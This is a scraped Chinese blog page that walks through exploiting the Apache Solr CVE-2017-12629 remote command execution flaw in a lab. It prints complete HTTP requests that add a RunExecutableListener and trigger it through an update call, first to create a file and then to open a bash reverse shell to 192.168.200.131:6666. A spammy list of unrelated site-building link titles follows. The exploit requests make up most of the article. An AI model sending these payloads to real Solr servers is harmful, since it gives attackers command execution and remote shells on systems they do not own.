当前位置: 首页 > news >正文

下载的网站模板如何安装能制作网页的软件

下载的网站模板如何安装,能制作网页的软件,太原免费网络推广哪里朿,公司网站维护经验总结Apache Solr 远程命令执行漏洞(CVE-2017-12629) Apache Solr 是一个开源的搜索服务器。Solr 使用 Java 语言开发,主要基于 HTTP 和 Apache Lucene 实现。原理大致是文档通过Http利用XML加到一个搜索集合中。查询该集合也是通过 http收到一个…

Apache Solr 远程命令执行漏洞(CVE-2017-12629)

Apache Solr 是一个开源的搜索服务器。Solr 使用 Java 语言开发,主要基于 HTTP 和 Apache Lucene 实现。原理大致是文档通过Http利用XML加到一个搜索集合中。查询该集合也是通过 http收到一个XML/JSON响应来实现。

攻击者可以通过发送HTTP POST请求到Solr的配置API,添加一个新的事件监听器,这个监听器可以配置为在Solr的某些事件发生时执行特定的命令。当Solr的特定事件发生时(如提交更改),Solr就会执行这些命令。这是一个无回显的RCE漏洞。

影响版本:Apache Solr < 7.1 Apache Lucene < 7.1

url:http://192.168.200.142:8983/solr/demo/config
http://192.168.200.142:8983/solr/demo/update

RCEpoc

创建listener

数据包

POST /solr/demo/config HTTP/1.1
Host: 192.168.200.142:8983
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Cookie: JSESSIONID=E55329857A4C0EB39ED2A6B369EDDCBE
Upgrade-Insecure-Requests: 1
Priority: u=0, i
Content-Length: 157{"add-listener":{"event":"postCommit","name":"newlistener","class":"solr.RunExecutableListener","exe":"sh","dir":"/bin/","args":["-c", "touch /tmp/ccc9wy"]}}

在这里插入图片描述

进行update操作,触发添加的listener

POST /solr/demo/update HTTP/1.1
Host: 192.168.200.142:8983
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Cookie: JSESSIONID=E55329857A4C0EB39ED2A6B369EDDCBE
Content-Type: application/json
Upgrade-Insecure-Requests: 1
Priority: u=0, i
Content-Length: 157[{"id":"test"}]

在这里插入图片描述

进入docker容器,查看,ccc9wy文件创建成功

在这里插入图片描述

反弹shell

设置监听器

POST /solr/demo/config HTTP/1.1
Host: 192.168.200.142:8983
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Cookie: JSESSIONID=E55329857A4C0EB39ED2A6B369EDDCBE
Upgrade-Insecure-Requests: 1
Priority: u=0, i
Content-Length: 157{"add-listener":{"event":"postCommit","name":"newlistener1","class":"solr.RunExecutableListener","exe":"bash","dir":"/bin/","args":["-c", "bash -i >& /dev/tcp/192.168.200.131/6666 0>&1"]}}

在这里插入图片描述

执行update操作,触发listener

在这里插入图片描述

成功获取反弹shell

在这里插入图片描述

http://www.15wanjia.com/news/168604.html

相关文章:

  • 网站建设管理标准seo查询官网
  • 绿色系网站大型网站的标准
  • 鼎城网站建设珠海网站制作套餐
  • 做网站比较好的英文seo招聘
  • 商城网站开发价格高端大气公司名称
  • hao123网站难做吗个人可否建立网站
  • 企业网络管理 网站开发与运营wordpress 网页加载慢
  • 分享站wordpress主题宿迁网站建设方案
  • php网站开发技术课程前端开发是做网站的吗
  • 房屋设计网站有哪些wordpress如何关闭rss
  • 大学生网站建设方案企业如何网络推广
  • 做网站整理信息的表格国内电商平台怎么做
  • 明星粉丝网站怎么做php 手机网站 模板
  • 质感网站系统下载 锐狐个人养老保险缴费明细
  • 庄河做网站erp系统都有哪几家
  • 婚纱网站建设需求分析百度账号登录官网
  • 个人网站做哪种能赚钱郑州营销型网站制作
  • 医院诊所网站源码不备案怎么做网站
  • 常州网站建设培训网站开发需要学数学吗
  • 健康网站模板网站建设的面试要求
  • vs2013如何做网站珠海 电商 网站建设
  • 上海网站建设排名公司用友erp管理软件系统
  • 做公众好号的网站上海网站建设公司sky
  • 做网站涉及个人隐私wordpress注册表文件夹
  • 建站本线上建模培训班哪个好
  • 做网站给不给源代码wordpress开发找工作
  • 咸阳 网站建设商城页面
  • 河南省城乡建设厅网站模板网站 建设教材
  • wordpress主题网站可以绑定域名的免费网站
  • 门户网站cms企业展示型网站程序